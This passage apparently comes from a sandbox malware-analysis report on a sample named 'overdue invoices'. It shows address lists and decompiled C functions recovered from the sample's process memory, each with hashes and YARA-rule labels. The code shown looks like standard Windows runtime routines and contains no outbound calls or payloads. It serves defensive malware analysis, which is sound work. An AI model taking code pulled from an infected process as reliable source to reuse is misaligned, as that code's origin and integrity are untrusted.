                  0x009ef9f6
                  0x009ef9f8
                  0x009ef9f8
                  0x009ef9f0
                  0x00992e23
                  0x009efa02
                  0x009efa03
                  0x009efa05
                  0x009efa06
                  0x00000000
                  0x00992e29
                  0x00992e29
                  0x00992e2e
                  0x00992e34
                  0x00992e3e
                  0x00000000
                  0x00000000
                  0x00992e44
                  0x00992e47
                  0x00992e4d
                  0x00000000
                  0x00000000
                  0x00992e4f
                  0x00992e54
                  0x00000000
                  0x00000000
                  0x00992e5a
                  0x00992e5f
                  0x00992e9a
                  0x00992ea4
                  0x00992ea5
                  0x00992ea8
                  0x00992eaf
                  0x00992eb2
                  0x00992eb5
                  0x009efae9
                  0x009efaeb
                  0x009efaed
                  0x009efaef
                  0x009efaf7
                  0x009efaf8
                  0x009efafd
                  0x009efaff
                  0x009efb04
                  0x009efb04
                  0x009efaff
                  0x00992ec0
                  0x00992ec4
                  0x00992ec6
                  0x00992ec8
                  0x009efb14
                  0x009efb18
                  0x009efb1e
                  0x009efb21
                  0x009efb21
                  0x00992ece
                  0x00992ece
                  0x00992ece
                  0x00992ed7
                  0x00992e61
                  0x00992e63
                  0x009efa6b
                  0x009efa71
                  0x009efa76
                  0x009efa78
                  0x009efa8a
                  0x009efa7a
                  0x009efa83
                  0x009efa83
                  0x009efa8f
                  0x009efa91
                  0x009efa97
                  0x009efa9d
                  0x009efaa4
                  0x009efaaa
                  0x009efaaf
                  0x009efab1
                  0x009efac3
                  0x009efab3
                  0x009efabc
                  0x009efabc
                  0x009efac8
                  0x009efacb
                  0x009efadf
                  0x009efadf
                  0x009efacb
                  0x009efaa4
                  0x009efa91
                  0x00992e6f
                  0x00992e6f
                  0x00992e5f
                  0x009efa13
                  0x009efa15
                  0x009efa17
                  0x009efa1f
                  0x009efa21
                  0x009efa22
                  0x009efa25
                  0x009efa28
                  0x009efa2f
                  0x009efa2f
                  0x009efa2a
                  0x009efa2a
                  0x009efa2a
                  0x009efa31
                  0x009efa34
                  0x009efa36
                  0x009efa3c
                  0x009efa3e
                  0x009efa41
                  0x009efa43
                  0x009efa45
                  0x009efa45
                  0x009efa41
                  0x009efa3c
                  0x009efa4a
                  0x009efa4f
                  0x009efa51
                  0x009efa53
                  0x009efa56
                  0x009efa5b
                  0x009efa5e
                  0x00000000
                  0x009efa5e
                  0x00992e23

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Re-Waiting
                  • API String ID: 0-316354757
                  • Opcode ID: 8954b9feb0d26a2722c6aeea16d3c49df6cf9867c57ada94a1901ec18dc0b585
                  • Instruction ID: 8751a1e2a62afb1316aff66a161809a55b2867e3d7e7063e977e7344f07e850b
                  • Opcode Fuzzy Hash: 8954b9feb0d26a2722c6aeea16d3c49df6cf9867c57ada94a1901ec18dc0b585
                  • Instruction Fuzzy Hash: 8A613731A00684AFDF32DFADC894B7E77A9EB84310F24067AE8159B2C1D7349D41C781
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A60EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00A60EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(L00A5FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00A61074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = L009D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00A5A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00A5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xa88b04 >> 0x14) + (_v44 -  *0xa88b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E009B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00A5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E009B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00A4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xa88724 & 0x00000008) != 0) {
						E00A552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00A615B5(0xa88ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                  0x00a60eb7
                  0x00a60eb9
                  0x00a60ec0
                  0x00a60ec2
                  0x00a60ecd
                  0x00a6105b
                  0x00a6105b
                  0x00a61061
                  0x00a61066
                  0x00a61066
                  0x00a6106b
                  0x00a61073
                  0x00a61073
                  0x00a60ed3
                  0x00a60ed6
                  0x00a60edc
                  0x00a60ee0
                  0x00a60ee7
                  0x00a60ef0
                  0x00a60ef5
                  0x00a60efa
                  0x00a60efc
                  0x00a60efd
                  0x00a60f03
                  0x00a60f04
                  0x00a60f06
                  0x00a60f07
                  0x00a60f09
                  0x00a60f0e
                  0x00a60f14
                  0x00a60f23
                  0x00a60f2d
                  0x00a60f34
                  0x00a60f34
                  0x00a60f14
                  0x00a60f52
                  0x00000000
                  0x00000000
                  0x00a60f58
                  0x00a60f73
                  0x00a60f74
                  0x00a60f79
                  0x00a60f7d
                  0x00a60f80
                  0x00a60f86
                  0x00a60fab
                  0x00a60fb5
                  0x00a60fc6
                  0x00a60fd1
                  0x00a60fe3
                  0x00a60fd3
                  0x00a60fdc
                  0x00a60fdc
                  0x00a60feb
                  0x00a61009
                  0x00a61009
                  0x00a61015
                  0x00a61027
                  0x00a61017
                  0x00a61020
                  0x00a61020
                  0x00a6102f
                  0x00a6103c
                  0x00a6103c
                  0x00a61048
                  0x00a61050
                  0x00a61050
                  0x00a61055
                  0x00000000
                  0x00a61055
                  0x00a60f88
                  0x00a60f9e
                  0x00a60fa2
                  0x00a60fa9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a60fa9
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: `
                  • API String ID: 0-2679148245
                  • Opcode ID: 27873cd3a0d46342050d98dea68dedf3dd5f7d7a218ed806b2edcf8247d05edc
                  • Instruction ID: e09852884be3c12f6850e23de793b67403f55e5f4a32938dd9d8f807ca42c88d
                  • Opcode Fuzzy Hash: 27873cd3a0d46342050d98dea68dedf3dd5f7d7a218ed806b2edcf8247d05edc
                  • Instruction Fuzzy Hash: DC51BD712043419FD724DF28D981F1BBBF5EBC4714F084A2CF99687291D670E889CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E009CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E009B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E009D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E009D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E009D95D0();
							goto L11;
						} else {
							_t109 = L009B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E009DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E009D95D0();
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                  0x009cf0d3
                  0x009cf0d9
                  0x009cf0e0
                  0x009cf0e7
                  0x009cf0f2
                  0x009cf0f4
                  0x009cf0f8
                  0x009cf100
                  0x009cf108
                  0x009cf10d
                  0x009cf115
                  0x009cf116
                  0x009cf11f
                  0x009cf123
                  0x009cf124
                  0x009cf12c
                  0x009cf130
                  0x009cf134
                  0x009cf13d
                  0x009cf144
                  0x009cf14b
                  0x009cf152
                  0x00a0bab0
                  0x00a0bab0
                  0x009cf158
                  0x009cf158
                  0x009cf15a
                  0x009cf160
                  0x009cf165
                  0x009cf166
                  0x009cf16f
                  0x009cf173
                  0x00a0baa7
                  0x00a0baa7
                  0x00a0baab
                  0x00000000
                  0x009cf179
                  0x009cf18d
                  0x009cf191
                  0x00a0baa2
                  0x00000000
                  0x009cf197
                  0x009cf19b
                  0x009cf1a2
                  0x009cf1a9
                  0x009cf1af
                  0x009cf1b2
                  0x009cf1b6
                  0x009cf1b9
                  0x009cf1c4
                  0x009cf1d8
                  0x009cf1df
                  0x009cf1e3
                  0x009cf1eb
                  0x009cf1ee
                  0x009cf1f4
                  0x009cf20f
                  0x00a0bab7
                  0x00a0babb
                  0x00a0bacc
                  0x00a0bad1
                  0x009cf215
                  0x009cf218
                  0x009cf226
                  0x009cf22b
                  0x00000000
                  0x009cf22b
                  0x009cf1f6
                  0x009cf1f6
                  0x009cf1f9
                  0x009cf1fb
                  0x009cf1fb
                  0x009cf1f4
                  0x009cf191
                  0x009cf173
                  0x009cf152
                  0x009cf203

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                  • Instruction ID: 3a5c981b44920f5f3b6fac2348d2fbaa8f87c2563862a34fd3ca19ba2a4f6efb
                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                  • Instruction Fuzzy Hash: 5F517971604710ABC320DF58C841B6BB7F9BF88750F008A2EF99587691E7B4E904CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A13540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00A13540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xa8d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E009D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L00A13706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E009DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00A13540;
						E009DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E009EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00A20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L009D97C0();
					}
					return L009DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00A13971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00A13884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E009DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L009D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L00A13787(_a4,  &_v352, _t80);
						}
					}
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E009D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                  0x00a13552
                  0x00a1355a
                  0x00a1355d
                  0x00a13566
                  0x00a13567
                  0x00a1357e
                  0x00a1358f
                  0x00a135a1
                  0x00a135a5
                  0x00a1366b
                  0x00a1366b
                  0x00a1366d
                  0x00a13672
                  0x00a13679
                  0x00a13685
                  0x00a1368d
                  0x00a1369d
                  0x00a136a7
                  0x00a136b8
                  0x00a136c6
                  0x00a136c7
                  0x00a136dc
                  0x00a136e1
                  0x00a136e7
                  0x00a136e9
                  0x00a136e9
                  0x00a13703
                  0x00a13703
                  0x00a135b5
                  0x00a135c0
                  0x00a135c4
                  0x00000000
                  0x00000000
                  0x00a135ca
                  0x00a135d7
                  0x00a135e2
                  0x00a135e6
                  0x00a135e8
                  0x00a135f5
                  0x00a135fa
                  0x00a13603
                  0x00a13604
                  0x00a13609
                  0x00a1360a
                  0x00a13612
                  0x00a13613
                  0x00a1361e
                  0x00a13622
                  0x00a13628
                  0x00a1362f
                  0x00a1362f
                  0x00a13636
                  0x00a13638
                  0x00a1363b
                  0x00a13642
                  0x00a13642
                  0x00a13636
                  0x00a13657
                  0x00a13657
                  0x00a1365c
                  0x00a13662
                  0x00a13669
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryHash
                  • API String ID: 0-2202222882
                  • Opcode ID: adf54daff85ded9f992194e488a854739c656bb7bfbdabbc462bb77bc0b49b36
                  • Instruction ID: cc4009857266df68c71a72a4033c7f8bdf0f4903658adf72bcb1cf8ee76fa59e
                  • Opcode Fuzzy Hash: adf54daff85ded9f992194e488a854739c656bb7bfbdabbc462bb77bc0b49b36
                  • Instruction Fuzzy Hash: 174132F290052CAADF21DE54CC81FEEB77CAB44714F0085A5BA19AB241DB709F888F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A605AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00A605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(L00A607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(L009D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00A5A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00A5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00A61293(_t79, _v40, L00A607DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E009B7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00A5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                  0x00a605c5
                  0x00a605ca
                  0x00a605d3
                  0x00a606db
                  0x00a606db
                  0x00a606dd
                  0x00a606e3
                  0x00a606e3
                  0x00a605dd
                  0x00a605e7
                  0x00a605f6
                  0x00a60600
                  0x00a60607
                  0x00a60610
                  0x00a60615
                  0x00a6061a
                  0x00a6061c
                  0x00a6061e
                  0x00a60624
                  0x00a60625
                  0x00a60627
                  0x00a60628
                  0x00a60631
                  0x00a60640
                  0x00a6064d
                  0x00a60654
                  0x00a60654
                  0x00a60631
                  0x00a6066d
                  0x00a60674
                  0x00000000
                  0x00000000
                  0x00a60692
                  0x00a6069e
                  0x00a606b0
                  0x00a606a0
                  0x00a606a9
                  0x00a606a9
                  0x00a606b8
                  0x00a606d6
                  0x00a606d6
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: `
                  • API String ID: 0-2679148245
                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                  • Instruction ID: 4c427397507fa760c7fa9a67f5651e11d17c69516b9b84cc1e24f0520516d8bc
                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                  • Instruction Fuzzy Hash: D331DF322043056BE720DF24CD85F9B7BA9ABC4754F044229BA589B2C0E6B0E954CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A13884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00A13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L009D9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L009B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L009D9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                  0x00a13893
                  0x00a13896
                  0x00a13899
                  0x00a1389f
                  0x00a138a0
                  0x00a138a4
                  0x00a138a9
                  0x00a138ac
                  0x00a138ad
                  0x00a138ae
                  0x00a138af
                  0x00a138b1
                  0x00a138b4
                  0x00a138bb
                  0x00a138bc
                  0x00a138bd
                  0x00a138c4
                  0x00a138c8
                  0x00a138ca
                  0x00a138ca
                  0x00a138d5
                  0x00a1393e
                  0x00a13940
                  0x00a13942
                  0x00a13952
                  0x00a13954
                  0x00a13961
                  0x00a13961
                  0x00a13967
                  0x00a1396e
                  0x00a1396e
                  0x00a13947
                  0x00a1394c
                  0x00000000
                  0x00a1394c
                  0x00a138ea
                  0x00a138ee
                  0x00a138f8
                  0x00a138f9
                  0x00a138ff
                  0x00a13900
                  0x00a13902
                  0x00a13903
                  0x00a1390b
                  0x00a1390f
                  0x00a13950
                  0x00000000
                  0x00a13950
                  0x00a13915
                  0x00a1391d
                  0x00a1391d
                  0x00a13922
                  0x00a13926
                  0x00000000
                  0x00a13928
                  0x00a1392b
                  0x00a1392b
                  0x00a13935
                  0x00a13937
                  0x00a13937
                  0x00000000
                  0x00a13935
                  0x00a13926
                  0x00a138f0
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryName
                  • API String ID: 0-215506332
                  • Opcode ID: 4335a1cdcca37e3ebd489836abe70b2d2a2b7736f53864c99ba4f6fb425f0132
                  • Instruction ID: e79859c13e978bbf3dfe1a3f2ac1d98f2a9723455151c5cc2d290547f9e1c108
                  • Opcode Fuzzy Hash: 4335a1cdcca37e3ebd489836abe70b2d2a2b7736f53864c99ba4f6fb425f0132
                  • Instruction Fuzzy Hash: 3E31F173901519AFDF15DF59C955EABB774EB80B20F118169B914AB240D7709F80C7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                  Download Yara Rule
                  C-Code - Quality: 33%
                  			E009CD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xa8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E009B4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L009DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E009D98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E009D95D0();
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                  0x009cd29c
                  0x009cd2a6
                  0x009cd2b1
                  0x009cd2b5
                  0x009cd2b6
                  0x009cd2bc
                  0x009cd2bd
                  0x009cd2be
                  0x009cd2bf
                  0x009cd2c2
                  0x009cd2c4
                  0x009cd2cc
                  0x009cd384
                  0x009cd34b
                  0x009cd34f
                  0x009cd350
                  0x009cd351
                  0x009cd35c
                  0x009cd35c
                  0x009cd2d6
                  0x009cd2da
                  0x009cd2e1
                  0x009cd361
                  0x009cd369
                  0x009cd36d
                  0x009cd2e3
                  0x009cd2e3
                  0x009cd2e3
                  0x009cd2e5
                  0x009cd2ed
                  0x009cd2f5
